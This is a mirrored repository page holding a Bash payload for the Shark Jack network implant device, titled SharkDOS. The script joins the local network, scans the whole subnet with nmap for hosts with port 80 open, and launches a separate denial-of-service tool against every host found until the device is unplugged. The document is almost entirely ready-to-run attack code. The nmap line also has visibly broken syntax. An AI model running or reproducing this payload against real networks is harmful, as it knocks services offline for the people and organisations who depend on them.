mirror of
https://github.com/hak5/sharkjack-payloads.git
synced 2026-05-03 07:01:46 +01:00
49 lines
1.6 KiB
Bash
49 lines
1.6 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: SharkDOS
|
|
# Author: drapl0n
|
|
# Category: Execution
|
|
# Version: 1.0
|
|
#
|
|
# SharkDOS payload intelligently scan target's network for open http(configurable
|
|
# for https) ports and DOS it.
|
|
#
|
|
# Dependencies: python3
|
|
#
|
|
# Directory Structure:
|
|
#
|
|
# | FileName | Directory |
|
|
# | ---------------------------- | ----------------------------------- |
|
|
# | payload.txt | /root/payload/sharkDOS/ |
|
|
# | sharkDOS | /root/payload/sharkDOS/ |
|
|
#
|
|
# NOTE: Create directory named "sharkDOS" in /root/payload/
|
|
#
|
|
#
|
|
LED SETUP
|
|
SERIAL_WRITE [*] Waiting for IP from DHCP...
|
|
NETMODE DHCP_CLIENT
|
|
SERIAL_WRITE [*] IP assigned from DHCP!
|
|
SERIAL_WRITE [*] Fetching IP for scanning network...
|
|
while [ -z "$SUBNET" ]; do
|
|
sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
|
|
done
|
|
SERIAL_WRITE [*] IP Fetched!
|
|
# Scan network
|
|
LED ATTACK
|
|
SERIAL_WRITE [*] Scanning for open http ports...
|
|
open=$(nmap -p 80 $SUBNET -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }'
|
|
SERIAL_WRITE [*] Scanning completed!
|
|
chmod +x /root/payload/sharkDOS/sharkDOS
|
|
SERIAL_WRITE [*] Started DOS execution...
|
|
echo "#\!/bin/bash" > /root/payload/sharkDOS/main
|
|
for i in $open
|
|
do
|
|
echo "python3 /root/payload/sharkDOS/sharkDOS $i -p 80 -s 500 &" >> /root/payload/sharkDOS/main
|
|
done
|
|
chmod +x /root/payload/sharkDOS/main
|
|
/root/payload/sharkDOS/./main
|
|
LED FINISH
|
|
SERIAL_WRITE [*] Payload complete! Unplug Shark Jack to stop DOS.
|
|
sleep 2 && sync
|